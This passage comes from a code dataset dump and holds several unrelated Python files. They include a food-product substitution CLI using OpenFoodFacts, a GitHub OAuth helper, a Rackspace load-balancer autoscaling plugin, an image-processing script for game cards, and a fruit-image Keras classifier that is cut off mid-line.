= talib.ATR(data[\"High\"], data[\"Low\"], data[\"Adj Close\"], timeperiod=14)\n df[\"ATR\"] = pd.Series(atr, index=df.index)\n\n return df\n\nif __name__ == \"__main__\":\n ATR(df=gd.getData(\"TSLA\"))\n","sub_path":"Volume_technical_analysis.py","file_name":"Volume_technical_analysis.py","file_ext":"py","file_size_in_byte":1093,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"62"} +{"seq_id":"98309318","text":"#!/usr/bin/python3\n'''\n Lists all cities associated with given state\n'''\nimport MySQLdb\nfrom sys import argv\nif __name__ == \"__main__\":\n connection = MySQLdb.connect(host=\"localhost\", port=3306, charset=\"utf8\",\n user=argv[1], passwd=argv[2], db=argv[3])\n cursor = connection.cursor()\n selection = \"SELECT cities.name FROM cities \" +\\\n \"JOIN states ON cities.state_id = states.id \" +\\\n \"WHERE states.name = %s ORDER BY cities.id ASC\"\n cursor.execute(selection, (argv[4],))\n rows = cursor.fetchall()\n\n ret = \"\"\n flag = False\n for eachRow in rows:\n ret += ', ' if flag else ''\n flag = True\n ret += eachRow[0]\n print(ret)\n cursor.close()\n connection.close()\n","sub_path":"0x0F-python-object_relational_mapping/5-filter_cities.py","file_name":"5-filter_cities.py","file_ext":"py","file_size_in_byte":773,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"62"} +{"seq_id":"317302775","text":"import json\nimport random\n\nimport mysql.connector\nimport requests\nfrom colorama import Back, Fore, init\n\nfrom config import configuration as conf\nfrom config.dbase import Dbase\nfrom purbeurre import header, home\n\ninit(autoreset=True)\n\n\ndef display_ls_categories():\n \"\"\"Displays the categories of the json file\n \"\"\"\n categories = conf.read_categories()[\"ls_categories\"]\n\n print(\"Liste des catégories disponibles :\")\n num = 0\n for category in categories:\n num += 1\n print(str(num).center(2, \" \"), \"-\", category)\n\n print(\"-\" * 80)\n category_input = input(\n \"Veuillez saisir un nombre entre 1 et {} ou 'q' pour quitter : \".format(len(categories)))\n\n if category_input.lower() == \"q\":\n print(\"\\nAu revoir et à bientôt\")\n exit()\n\n else:\n try:\n category_input = int(category_input)\n except:\n error = (\n \" Veuillez saisir un nombre entre 1 et {} ou 'q' pour quitter\".format(len(categories)))\n header(error)\n display_ls_categories()\n else:\n if category_input > 0 and category_input <= len(categories):\n category = categories[category_input-1]\n print(\"\\nVous avez choisi la catégorie :\", category)\n print(\"-\" * 80)\n header()\n display_ls_products(category)\n\n else:\n error = (\n \"Veuillez saisir un nombre entre 1 et {} ou 'q' pour quitter\".format(len(categories)))\n header(error)\n display_ls_categories()\n\n\ndef display_ls_products(category, page_number=1):\n \"\"\"Display the list of products\n\n Arguments:\n category {str} -- Category\n\n Keyword Arguments:\n page_number {int} -- Page number (default: {1})\n \"\"\"\n url = conf.url_categories(category, page_number)\n r = requests.get(url).json()\n products = json.dumps(r)\n page = json.loads(products)\n num_page = page['page']\n total_products = page[\"count\"]\n number_page = int(page[\"count\"]/20 + 1)\n print(\"Nb de '{}' trouvé(e)s = {} - Page = {} sur {}\".format(category,\n total_products, num_page, number_page))\n product_num = 1\n for x in page['products']:\n print(\"{:2d} - {}, {}\".format(product_num,\n x['product_name_fr'], x['quantity']))\n product_num += 1\n print(\"-\" * 80)\n if num_page > 1:\n print(\"

- Page précèdente\")\n else:\n print(\"-\")\n print(\" - Page suivante\")\n print(\" - Accueil\")\n print(\" - Quitter\")\n\n product_choice = input(\"\\nEntrez votre choix : \")\n\n if product_choice == \"p\":\n if num_page > 1:\n header()\n display_ls_products(category, page_number - 1)\n else:\n header()\n display_ls_products(category, page_number=1)\n\n elif product_choice == \"s\":\n header()\n display_ls_products(category, page_number + 1)\n\n elif product_choice == \"a\":\n header()\n home()\n\n elif product_choice == \"q\":\n print(\"\\nAu revoir et à bientôt\")\n exit()\n\n try:\n product_choice = int(product_choice)\n except:\n error = (\n \"Veuillez saisir un nombre entre 1 et {}, 'n', 'q'\".format(len(page['products'])))\n header(error)\n display_ls_products(category)\n else:\n if product_choice > 0 and product_choice <= len(page['products']):\n code = (page['products'][product_choice-1]['code'])\n header()\n display_product(code, category)\n display_alter_product(code, category)\n\n else:\n error = (\n \" Veuillez saisir un nombre entre 1 et {}, 'n', 'q'\".format(len(page['products'])))\n header(error)\n display_ls_products(category, page_number)\n\n\ndef display_product(code, category):\n \"\"\"Displays the 'product sheet'\n\n Arguments:\n code {str} -- Code product\n category {str} -- Category\n \"\"\"\n category = category\n url = conf.url_product(code)\n r = requests.get(url).json()\n page_product = json.dumps(r)\n\n product = json.loads(page_product)\n line_1 = \"Code produit ...........: \"\n line_2 = \"Nom du produit .........: \"\n line_3 = \"Quantité ...............: \"\n line_4 = \"Fabriquant .............: \"\n line_5 = \"Suggestion de magasin ..: \"\n line_6 = \"Nutri-score ............: \"\n line_7 = \"Page OpenFoodFacts .....: \"\n\n print(f\"{line_1}{product['code']}\")\n print(f\"{line_2}{product['product']['product_name_fr']}\")\n print(f\"{line_3}{product['product']['quantity']}\")\n print(f\"{line_4}{product['product']['brands']}\")\n print(f\"{line_5}{product['product']['stores']}\")\n\n if product['product']['nutrition_grades'] == \"a\":\n print(line_6 + Back.GREEN + Fore.BLACK + \" \" +\n product['product']['nutrition_grades'] + \" \")\n elif product['product']['nutrition_grades'] == \"b\":\n print(line_6 + Back.GREEN + Fore.YELLOW + \" \" +\n product['product']['nutrition_grades'] + \" \")\n elif product['product']['nutrition_grades'] == \"c\":\n print(line_6 + Back.YELLOW + Fore.BLACK + \" \" +\n product['product']['nutrition_grades'] + \" \")\n elif product['product']['nutrition_grades'] == \"d\":\n print(line_6 + Back.YELLOW + Fore.RED + \" \" +\n product['product']['nutrition_grades'] + \" \")\n elif product['product']['nutrition_grades'] == \"e\":\n print(line_6 + Back.RED + Fore.BLACK + \" \" +\n product['product']['nutrition_grades'] + \" \")\n\n print(f\"{line_7}https://fr.openfoodfacts.org/produit/\\\n{product['product']['code']}\")\n\n\ndef display_alter_product(code, category):\n \"\"\"Search alternative product\n\n Arguments:\n code {str} -- Code product\n category {str} -- Category\n \"\"\"\n category = category\n url = conf.url_product(code)\n r = requests.get(url).json()\n page_product = json.dumps(r)\n product = json.loads(page_product)\n print(\"*\" * 80)\n # print(product['product']['generic_name_fr'])\n # print(len(product['product']['generic_name_fr']))\n\n if len(product['product']['generic_name_fr']) == 0:\n keyword = conf.cleaner(product['product']['product_name_fr'])\n print(\"Produit de subsitution pour :\", keyword)\n else:\n keyword = conf.cleaner(product['product']['generic_name_fr'])\n print(\"Produit de sublistution pour :\", keyword)\n\n if product['product']['nutrition_grades'] != \"a\":\n url = conf.url_alt_product(keyword)\n r = requests.get(url).json()\n page_alter = json.dumps(r)\n alter = json.loads(page_alter)\n if alter[\"count\"] > 0:\n print(\"Nombre de produits trouvés en nutriscore 'a':\",\n alter[\"count\"])\n if alter[\"count\"] > 20:\n hazard = random.randint(0, 20)\n # print(\"URL:\", alter[\"products\"][hazard][\"url\"])\n code = (alter[\"products\"][hazard-1][\"code\"])\n display_product(code, category)\n else:\n hazard = random.randint(0, alter[\"count\"])\n # print(\"URL:\", alter[\"products\"][hazard][\"url\"])\n code = (alter[\"products\"][hazard-1][\"code\"])\n display_product(code, category)\n else:\n url = conf.url_alt_product(keyword, 'b')\n r = requests.get(url).json()\n page_alter = json.dumps(r)\n alter = json.loads(page_alter)\n if alter[\"count\"] > 0:\n print(\"Nombre de produits trouvés en nutriscore 'b':\",\n alter[\"count\"])\n if alter[\"count\"] > 20:\n hazard = random.randint(0, 20)\n # print(\"URL:\", alter[\"products\"][hazard][\"url\"])\n code = (alter[\"products\"][hazard-1][\"code\"])\n display_product(code, category)\n else:\n hazard = random.randint(0, alter[\"count\"])\n # print(\"URL:\", alter[\"products\"][hazard][\"url\"])\n code = (alter[\"products\"][hazard-1][\"code\"])\n display_product(code, category)\n else:\n url = conf.url_alt_product(keyword, 'c')\n r = requests.get(url).json()\n page_alter = json.dumps(r)\n alter = json.loads(page_alter)\n if alter[\"count\"] > 0:\n print(\"Nombre de produits trouvés en nutriscore 'c':\",\n alter[\"count\"])\n if alter[\"count\"] > 20:\n hazard = random.randint(0, 20)\n # print(\"URL:\", alter[\"products\"][hazard][\"url\"])\n code = (alter[\"products\"][hazard-1][\"code\"])\n display_product(code, category)\n else:\n hazard = random.randint(0, alter[\"count\"])\n # print(\"URL:\", alter[\"products\"][hazard][\"url\"])\n code = (alter[\"products\"][hazard-1][\"code\"])\n display_product(code, category)\n else:\n print(\"\\nOups ! Pas de produit de substition trouvé :-(\")\n\n else:\n print(\"\")\n\n print(\"-\" * 80)\n print(\" - Accueil\")\n print(\" - Retour\")\n print(\" - Enregistrer\")\n print(\" - Quitter\")\n\n alter_input = input(\"\\nEntrez votre choix : \")\n\n if alter_input.lower() == \"q\":\n print(\"\\nAu revoir et à bientôt\")\n exit()\n\n elif alter_input.lower() == \"e\":\n try:\n Dbase.insert_tbl_categories(code, category)\n except mysql.connector.Error as err:\n if err.errno == 1062:\n msg = (\"Produit déjà enregistré\")\n header(msg)\n display_ls_products(category)\n else:\n msg = (\"Produit enregistré\")\n header(msg)\n display_ls_products(category)\n\n elif alter_input.lower() == \"a\":\n header()\n home()\n\n elif alter_input.lower() == \"r\":\n header()\n display_ls_products(category)\n\n else:\n error = (\"Saisie incorrecte\")\n header(error)\n display_ls_products(category)\n\n\ndef display_all_records():\n \"\"\"Displays all records in the database\n \"\"\"\n print(\"Display all records\")\n cnx = Dbase.sql_connect()\n cur = cnx.cursor()\n cur.execute(\"USE purbeurre\")\n cur.execute(\"\"\"\n SELECT * FROM Records;\n \"\"\")\n number_line = 1\n for raw in cur:\n print(f\"{raw[0]} - {raw[2]} {raw[3]}\")\n number_line += 1\n\n print(\"\")\n print(\"-\" * 80)\n print(\" - Accueil\")\n print(\" - Quitter\")\n ask = input(\">> \")\n\n if ask.lower() == \"q\":\n print(\"\\nAu revoir et à bientôt\")\n exit()\n\n elif ask.lower() == \"a\":\n header()\n home()\n\n try:\n ask = int(ask)\n except:\n error = (\"Entrée incorrecte\")\n header(error)\n display_all_records()\n else:\n header()\n display_record(ask, raw[1], raw[8])\n\n\ndef display_record(ask, code, category):\n \"\"\"Displays a product registered in the database\n\n Arguments:\n ask {str} -- User response\n code {str} -- Code product\n category {str} -- Category\n \"\"\"\n cnx = Dbase.sql_connect()\n cur = cnx.cursor()\n cur.execute(\"USE purbeurre\")\n\n cur.execute(\"\"\"\n SELECT * FROM Records WHERE id={}\n \"\"\".format(ask))\n product = (cur.fetchone())\n\n display_product(product[1], product[8])\n\n print(\"\")\n print(\"-\" * 80)\n print(\" - Accueil\")\n print(\" - Quitter\")\n print(\" - Retour\")\n\n ask2 = input(\">> \")\n\n if ask2.lower() == \"q\":\n print(\"\\nAu revoir et à bientôt\")\n exit()\n\n elif ask2.lower() == \"a\":\n header()\n home()\n\n elif ask2.lower() == \"r\":\n header()\n display_all_records()\n\n else:\n error = (\"Entrée incorrecte\")\n header(error)\n # display_all_records()\n display_record(ask, product[1], product[8])\n","sub_path":"config/display.py","file_name":"display.py","file_ext":"py","file_size_in_byte":12202,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"62"} +{"seq_id":"608007926","text":"import pytest\n\nfrom django_dramatiq import tasks\nfrom dramatiq import Worker\n\n\n@pytest.fixture\ndef broker():\n yield tasks.broker\n tasks.broker.flush_all()\n\n\n@pytest.fixture\ndef worker(broker):\n worker = Worker(broker, worker_timeout=100)\n worker.start()\n yield worker\n worker.stop()\n","sub_path":"tests/conftest.py","file_name":"conftest.py","file_ext":"py","file_size_in_byte":301,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"62"} +{"seq_id":"218888285","text":"\n\nfrom xai.brain.wordbase.nouns._synonym import _SYNONYM\n\n#calss header\nclass _SYNONYMS(_SYNONYM, ):\n\tdef __init__(self,): \n\t\t_SYNONYM.__init__(self)\n\t\tself.name = \"SYNONYMS\"\n\t\tself.specie = 'nouns'\n\t\tself.basic = \"synonym\"\n\t\tself.jsondata = {}\n","sub_path":"xai/brain/wordbase/nouns/_synonyms.py","file_name":"_synonyms.py","file_ext":"py","file_size_in_byte":245,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"62"} +{"seq_id":"315510499","text":"# -*- coding: utf-8 -*-\nimport logging\nimport os\n\nimport yaml\n\n# Constants needed in scripts\nSRC_DIR = \"/opt/odoo/custom/src\"\nADDONS_YAML = SRC_DIR + \"/addons.yaml\"\nADDONS_DIR = \"/opt/odoo/auto/addons\"\nCLEAN = os.environ.get(\"CLEAN\") == \"true\"\nLINK = os.environ.get(\"LINK\") == \"true\"\n\n# Allow to change log level for build\nlogging.root.setLevel(int(os.environ.get(\"LOG_LEVEL\", logging.INFO)))\n\n\ndef addons_config():\n \"\"\"Load configurations from ``ADDONS_YAML`` into a dict.\"\"\"\n config = dict()\n with open(ADDONS_YAML) as addons_file:\n for doc in yaml.load_all(addons_file):\n for repo, addons in doc.items():\n config.setdefault(repo, list())\n config[repo] += addons\n\n return config\n","sub_path":"lib/odoobaselib.py","file_name":"odoobaselib.py","file_ext":"py","file_size_in_byte":741,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"62"} +{"seq_id":"171906055","text":"# -*- coding: utf-8 -*-\n\n# vim: tabstop=4 shiftwidth=4 softtabstop=4\n#\n# this file is part of 'RAX-AutoScaler'\n#\n# Copyright 2014 Rackspace US, Inc.\n#\n# Licensed under the Apache License, Version 2.0 (the \"License\");\n# you may not use this file except in compliance with the License.\n# You may obtain a copy of the License at\n#\n# http://www.apache.org/licenses/LICENSE-2.0\n#\n# Unless required by applicable law or agreed to in writing, software\n# distributed under the License is distributed on an \"AS IS\" BASIS,\n# WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied.\n# See the License for the specific language governing permissions and\n# limitations under the License.\n#\n# Example config:\n#\n# \"raxclb\":{\n# \"scale_up_threshold\": 50,\n# \"scale_down_threshold\": 1,\n# \"check_type\": \"\",\n# \"load_balancers\": \n# }\n\nimport pyrax\nfrom raxas.core_plugins.base import PluginBase\nfrom datetime import datetime, timedelta\nimport logging\nfrom pyrax.exceptions import NotFound\n\n\nclass Raxclb(PluginBase):\n \"\"\" Rackspace cloud load balancer plugin.\n\n \"\"\"\n\n def __init__(self, scaling_group):\n super(Raxclb, self).__init__(scaling_group)\n\n self.scaling_group = scaling_group\n config = scaling_group.plugin_config.get(self.name)\n\n self.scale_up_threshold = config.get('scale_up_threshold', 50)\n self.scale_down_threshold = config.get('scale_down_threshold', 1)\n self.check_type = config.get('check_type', '')\n self.lb_ids = config.get('loadbalancers', [])\n self.check_time = 2\n self.scaling_group = scaling_group\n\n @property\n def name(self):\n return 'raxclb'\n\n def make_decision(self):\n \"\"\"\n This function decides to scale up or scale down\n\n :returns: 1 scale up\n 0 do nothing\n -1 scale down\n None No data available\n \"\"\"\n\n logger = logging.getLogger(__name__)\n\n clb = pyrax.cloud_loadbalancers\n\n if not self.lb_ids:\n launch_config = self.scaling_group.launch_config\n if launch_config is None:\n return None\n\n try:\n self.lb_ids = [lb.get('loadBalancerId') for lb\n in launch_config.get('load_balancers')]\n except TypeError:\n logger.error('No loadbalancer found, please either define a '\n 'loadbalancer to check or add one to the scaling group.')\n return None\n\n start_time = datetime.utcnow() - timedelta(hours=int(self.check_time))\n\n results = []\n\n active_server_count = self.scaling_group.state['active_capacity']\n\n self.scale_up_threshold = self.scale_up_threshold * active_server_count\n self.scale_down_threshold = self.scale_down_threshold * active_server_count\n\n if self.check_type.upper() == 'SSL':\n hist_check = 'averageNumConnectionsSsl'\n cur_check = 'currentConnSsl'\n\n else:\n hist_check = 'averageNumConnections'\n cur_check = 'currentConn'\n\n for lb in self.lb_ids:\n try:\n check_clb = clb.get(lb)\n except NotFound:\n logger.error('Loadbalancer specified does not exist')\n return None\n\n usage = check_clb.get_usage(start=start_time)\n current_usage = check_clb.get_stats()\n\n records = []\n\n for record in usage.get('loadBalancerUsageRecords'):\n records.append(record.get(hist_check))\n\n try:\n current_conn = current_usage.get(cur_check)\n average_historical = sum(records) / len(records)\n average = ((current_conn * 1.5) + average_historical) / 2\n except ZeroDivisionError:\n average = current_usage.get(cur_check)\n\n if average > self.scale_up_threshold:\n results.append(1)\n logger.info(\"Raxclb reports scale up for lb %s\", lb)\n elif average < self.scale_down_threshold:\n results.append(-1)\n logger.info(\"Raxclb reports scale down for lb %s\", lb)\n else:\n results.append(0)\n logger.info(\"Raxclb reports normal for lb %s\", lb)\n\n return sum(results)\n","sub_path":"raxas/core_plugins/raxclb.py","file_name":"raxclb.py","file_ext":"py","file_size_in_byte":4398,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"62"} +{"seq_id":"85642309","text":"#! /usr/bin/env python\n\nimport sys\nimport re\nimport os\nimport subprocess\nimport shutil\nimport tempfile\n\nfrom datetime import date\nfrom collections import defaultdict\n\nfrom natsort import natsorted\n\nfrom file_builders import build_card_files\n\nSCRIPT_DIR = \"/home/teddy/projects/dixit/cards\"\nFRONTEND_DIR = \"/home/teddy/projects/dixit/client\"\nBACKEND_DIR = \"/home/teddy/projects/dixit/server\"\n\nFRONTEND_CARD_PATH = \"cards\"\nSQL_FILENAME = \"insert_cards.sql\"\nSQL_OUTPUT = os.path.join(SCRIPT_DIR, SQL_FILENAME)\n\nTEMPLATE_FILENAME = \"cards_template.html\"\nHTML_OUTPUT = \"index.html\"\n\nBUILDER_TEMPLATE = \"builder_template.html\"\nBUILDER_OUTPUT = \"deck_builder.html\"\n\nOUTPUT_SIZE = \"350x560^\"\nTMP_GIF_NAME = \"tmp.gif\"\n\nPROCESSED_CARDS_LIST = \"processed\"\nIMAGE_DIRECTORY = \"src_images\"\n\nDEFAULT_VERBOSITY = 1\nPROG_NAME = \"standardize_images\"\n\nPREPROCESS_GIFS = False\n\ndef log(text, verbosity=1):\n if verbosity <= DEFAULT_VERBOSITY:\n print(\"{}: {}\".format(PROG_NAME, text))\n\ndef change_ext(filename, new_ext):\n \"\"\"return a new filename, with the extension changed.\n \"\"\"\n return re.sub(r\"\\.\\w+$\", new_ext, filename)\n\ndef map_img_extensions(extension):\n #keep gif filetype, otherwise convert to png\n if extension == \".gif\":\n return \".gif\"\n\n return \".png\"\n\ndef preprocess_gif(tmp_dir, input_path):\n preprocess_output = os.path.join(tmp_dir, \"tmp.gif\")\n subprocess.run([\n \"magick\",\n input_path,\n \"-coalesce\",\n preprocess_output\n ])\n return preprocess_output\n\ndef get_processed_path():\n return os.path.join(SCRIPT_DIR, PROCESSED_CARDS_LIST)\n\ndef load_processed():\n process_path = get_processed_path()\n try:\n processed_dict = {}\n with open(process_path, 'r') as processed:\n for line in processed:\n entries = re.split(r\",\\s*\", line.strip())\n if len(entries) != 3:\n log(\"Malformed processed file entry: {}\".format(line))\n continue\n inp_name, out_name, date = entries\n processed_dict[inp_name] = {\"name\":out_name, \"date\":date}\n return processed_dict\n except FileNotFoundError:\n log(\"No list of processed files found, skipping.\")\n\ndef build_indices(processed):\n if not processed:\n log(\"Not building index dict since there are no processed files\",\n verbosity=2)\n return\n\n indices = defaultdict(int)\n for key, value in processed.items():\n base_filename = os.path.basename(value[\"name\"])\n match = re.match(r\"[^_]+(?=_)\", base_filename)\n\n if not match:\n log(\"unexpected filename format found: {}\".format(base_filename))\n continue\n\n file_prefix = match.group()\n indices[file_prefix] += 1\n\n return indices\n\ndef make_sorted_card_list(card_data):\n card_list = []\n for _, dir_cards in card_data.items():\n card_list += [(date_added, filename)\n for filename, date_added in dir_cards]\n\n return sorted(card_list)\n\ndef invert_card_list(card_list):\n return {\n filename:i for i, (_, filename) in enumerate(card_list)\n }\n\ndef run_standardize(directory, processed_files=None,\n processed_handle=None, file_indices=None):\n\n if not processed_handle:\n log(\"No handle provided for processed files! The script will not\"\n \"remember which files were updated on this run.\")\n\n output_directory = os.path.join(FRONTEND_DIR, FRONTEND_CARD_PATH)\n dir_key = os.path.basename(directory)\n\n if file_indices and dir_key in file_indices:\n index = file_indices[dir_key]\n else:\n index = 0\n\n card_data = []\n\n #create a temporary directory for preprocessing gifs\n processing_dir = tempfile.TemporaryDirectory()\n\n for base, dirs, files in os.walk(directory):\n dirs.sort()\n sort_files = natsorted(files)\n for filename in sort_files:\n _, extension = os.path.splitext(filename)\n new_extension = map_img_extensions(extension)\n\n output_filename = \"{}_card{:02}{}\".format(dir_key, index, new_extension)\n input_path = os.path.join(base, filename)\n output_path = os.path.join(output_directory, output_filename)\n\n processed_key = input_path\n if not processed_files or processed_key not in processed_files:\n if PREPROCESS_GIFS and extension == \".gif\":\n log(\"Preprocessing gif file: {}\".format(input_path))\n input_path = preprocess_gif(processing_dir.name, input_path)\n log(\"Produced temporary gif file: {}\".format(input_path))\n\n log(\"Processing file: {}. Output: {}\".format(input_path, output_path))\n\n date_added = date.today().isoformat()\n\n subprocess.run([\"magick\",\n input_path,\n \"-resize\",\n OUTPUT_SIZE,\n \"-layers\",\n \"optimize\",\n output_path])\n\n if processed_handle:\n processed_handle.write(\"{}, {}, {}\\n\".format(processed_key,\n output_filename,\n date_added))\n\n\n index += 1\n else:\n log(\"Skipping file: {}\".format(input_path))\n output_filename = processed_files[processed_key][\"name\"]\n date_added = processed_files[processed_key][\"date\"]\n\n card_data.append((output_filename, date_added))\n\n processing_dir.cleanup()\n\n return card_data\n\n\ndef process_dirs(directories):\n processed_files = load_processed()\n indices = build_indices(processed_files)\n card_data = {}\n\n with open(get_processed_path(), 'a') as processed_handle:\n for dirname in directories:\n dir_cards = run_standardize(\n dirname,\n processed_files, processed_handle,\n file_indices=indices)\n\n card_data[os.path.basename(dirname)] = dir_cards\n\n global_indices = invert_card_list(make_sorted_card_list(card_data))\n build_card_files(card_data, global_indices)\n\n\ndef main():\n if len(sys.argv) > 1:\n directories = sys.argv[1:]\n else:\n src_dirs = os.path.join(SCRIPT_DIR, IMAGE_DIRECTORY)\n directories = [os.path.join(src_dirs, im_dir)\n for im_dir in natsorted(os.listdir(src_dirs))]\n\n process_dirs(directories)\n\nif __name__ == \"__main__\":\n main()\n","sub_path":"cards/process_images.py","file_name":"process_images.py","file_ext":"py","file_size_in_byte":6677,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"62"} +{"seq_id":"265195532","text":"\"\"\" \n@Author: huuuuusy\n@GitHub: https://github.com/huuuuusy\n系统: Ubuntu 18.04\nIDE: VS Code 1.39\n工具: python == 3.7.3\n\"\"\"\n\n\"\"\"\n思路:\n 字典直接求解\n结果:\n 执行用时 : 40 ms, 在所有 Python3 提交中击败了88.89%的用户\n 内存消耗 : 13.7 MB, 在所有 Python3 提交中击败了100%的用户\n\"\"\"\n\nclass Solution:\n def isStrobogrammatic(self, num):\n lookup = {\n \"6\" : \"9\",\n \"9\" :\"6\",\n \"8\" : \"8\",\n \"1\" : \"1\",\n \"0\" :\"0\"\n }\n rotate_num = \"\"\n for a in num:\n if a in lookup:\n rotate_num += lookup[a]\n else:\n return False\n return rotate_num[::-1] == num\n \n\nif __name__ == \"__main__\":\n num = \"101\"\n answer = Solution().isStrobogrammatic(num)\n print(answer)","sub_path":"LeetCode/python-R1/0246-中心对称数/V1.py","file_name":"V1.py","file_ext":"py","file_size_in_byte":844,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"62"} +{"seq_id":"283486304","text":"import requests\nfrom aspen import json, log, Response\nfrom aspen.website import Website\nfrom aspen.utils import typecheck\nfrom gittip import db, networks\n\n\ndef upsert(user_info):\n return networks.upsert( 'github'\n , user_info['id']\n , user_info['login']\n , user_info\n )\n\n\ndef oauth_url(website, action, then=u\"\"):\n \"\"\"Given a website object and a string, return a URL string.\n\n `action' is one of 'opt-in', 'lock' and 'unlock'\n\n `then' is either a github username or an URL starting with '/'. It's\n where we'll send the user after we get the redirect back from\n GitHub.\n\n \"\"\"\n typecheck(website, Website, action, unicode, then, unicode)\n assert action in [u'opt-in', u'lock', u'unlock']\n url = u\"https://github.com/login/oauth/authorize?client_id=%s&redirect_uri=%s\"\n url %= (website.github_client_id, website.github_callback)\n\n # Pack action,then into data and base64-encode. Querystring isn't\n # available because it's consumed by the initial GitHub request.\n\n data = u'%s,%s' % (action, then)\n data = data.encode('UTF-8').encode('base64').decode('US-ASCII')\n url += u'?data=%s' % data\n return url\n\n\ndef oauth_dance(website, qs):\n \"\"\"Given a querystring, return a dict of user_info.\n\n The querystring should be the querystring that we get from GitHub when\n we send the user to the return value of oauth_url above.\n\n See also:\n\n http://developer.github.com/v3/oauth/\n\n \"\"\"\n\n log(\"Doing an OAuth dance with Github.\")\n\n if 'error' in qs:\n raise Response(500, str(qs['error']))\n\n data = { 'code': qs['code'].encode('US-ASCII')\n , 'client_id': website.github_client_id\n , 'client_secret': website.github_client_secret\n }\n r = requests.post(\"https://github.com/login/oauth/access_token\", data=data)\n assert r.status_code == 200, (r.status_code, r.text)\n\n back = dict([pair.split('=') for pair in r.text.split('&')]) # XXX\n if 'error' in back:\n raise Response(400, back['error'].encode('utf-8'))\n assert back.get('token_type', '') == 'bearer', back\n access_token = back['access_token']\n\n r = requests.get( \"https://api.github.com/user\"\n , headers={'Authorization': 'token %s' % access_token}\n )\n assert r.status_code == 200, (r.status_code, r.text)\n user_info = json.loads(r.text)\n log(\"Done with OAuth dance with Github for %s (%s).\"\n % (user_info['login'], user_info['id']))\n\n return user_info\n\n\ndef resolve(login):\n \"\"\"Given two str, return a participant_id.\n \"\"\"\n FETCH = \"\"\"\\\n\n SELECT participant_id\n FROM social_network_users\n WHERE network='github'\n AND user_info -> 'login' = %s\n\n \"\"\" # XXX Uniqueness constraint on login?\n rec = db.fetchone(FETCH, (login,))\n if rec is None:\n raise Exception(\"GitHub user %s has no participant.\" % (login))\n return rec['participant_id']\n","sub_path":"gittip/networks/github.py","file_name":"github.py","file_ext":"py","file_size_in_byte":3051,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"62"} +{"seq_id":"71227344","text":"import numpy as np\nimport cv2\nimport glob\nimport os\n\ndef reading_images(fruit_img, fruit_labels, img_folder):\n for fruit_dir_path in glob.glob(img_folder):\n fruit_name = fruit_dir_path.split(\"\\\\\")[-1]\n# print(fruit_name)\n for image_path in glob.glob(os.path.join(fruit_dir_path, \"*.jpg\")):\n image = cv2.imread(image_path, cv2.IMREAD_COLOR)\n# print(image_path)\n image = cv2.resize(image, (100, 100))\n fruit_img.append((image / 255.).tolist())\n fruit_labels.append(fruit_name)\n for image_path in glob.glob(os.path.join(fruit_dir_path, \"*.jpeg\")):\n image = cv2.imread(image_path, cv2.IMREAD_COLOR)\n# print(image_path)\n image = cv2.resize(image, (100, 100))\n fruit_img.append((image / 255.).tolist())\n fruit_labels.append(fruit_name)\n for image_path in glob.glob(os.path.join(fruit_dir_path, \"*.png\")):\n image = cv2.imread(image_path, cv2.IMREAD_COLOR)\n# print(image_path)\n image = cv2.resize(image, (100, 100))\n fruit_img.append((image / 255.).tolist())\n fruit_labels.append(fruit_name)\n return fruit_img, fruit_labels\n\n\n# glob.glob(\"C:/Users/Ryan/Desktop/Udacity Machine Learning/capstone/food/training/*\")\n\nfruit_images = []\nlabels = []\n\nfruit_images, labels = reading_images(fruit_images, labels,\n \"C:/Users/Ryan/Desktop/Udacity Machine Learning/capstone/new_fruit/fruits/*\")\n\nlen(fruit_images)\n110 + 115 + 108 + 120 + 100 + 99 + 100 + 108 + 101 + 100 + 120 + 117 + 116 + 100 + 101 + 100 + 115 + 100 + 100 + 119 + 100 + 100\n\n#import collections\n#collections.Counter(labels)\n\ndef helper_label(list_of_labels):\n from sklearn.preprocessing import OneHotEncoder, LabelEncoder\n encoder = LabelEncoder()\n # turn the labels to 0 - 45\n encoder_int = encoder.fit_transform(list_of_labels)\n encoder_int = encoder_int.reshape(len(encoder_int), 1)\n one_hot_encoder = OneHotEncoder(sparse=False)\n labels_encoded = one_hot_encoder.fit_transform(encoder_int)\n return labels_encoded\n\nencoded_labels = helper_label(labels)\n\n# generate random index numbers\nimport random\n\n# randomize the index\nidx = random.sample(range(len(labels)), len(labels))\n\n# turn into array, to make the calculation faster?\nidx = np.array(idx)\nencoded_labels = np.array(encoded_labels)\nfruit_images = np.array(fruit_images)\n# save those indexes\ntrain_idx = idx[:int(len(idx) * 0.8)]\nvalidation_idx = idx[int(len(idx) * 0.8):int(len(idx) * 0.95)]\ntest_idx = idx[int(len(idx) * 0.95):]\n\n# apply those index to training, validation, and test set\nlabels_train = encoded_labels[train_idx]\nimage_train = fruit_images[train_idx]\nlabels_valid = encoded_labels[validation_idx]\nimage_valid = fruit_images[validation_idx]\nlabels_test = encoded_labels[test_idx]\nimage_test = fruit_images[test_idx]\n# check the distribution of the labels\nsum(encoded_labels)\nsum(labels_train)\nsum(labels_valid)\nsum(labels_test)\n# frequency table, if needed\n# from collections import Counter\n# freq = Counter(labels)\n\n\n# -------------------------- B E N C H M A R K M O D E L ------------------------\n# run a benchmark model\n# basic benchmark model (in development)\nfrom keras.layers import Conv2D, MaxPooling2D, GlobalAveragePooling2D\nfrom keras.layers import Dropout, Dense, Flatten\nfrom keras.models import Sequential\n\nbenchmark_model = Sequential()\nbenchmark_model.add(Flatten(input_shape=image_train.shape[1:])) # image_train.shape[1:] is (100,100,3)\nbenchmark_model.add(Dense(256, activation='relu'))\n# benchmark_model.add(Dropout(0.3))\nbenchmark_model.add(Dense(256, activation='relu'))\nbenchmark_model.add(Dropout(0.3))\nbenchmark_model.add(Dense(22, activation='softmax'))\nbenchmark_model.summary()\n\nbenchmark_model.compile(optimizer='rmsprop', loss='categorical_crossentropy', 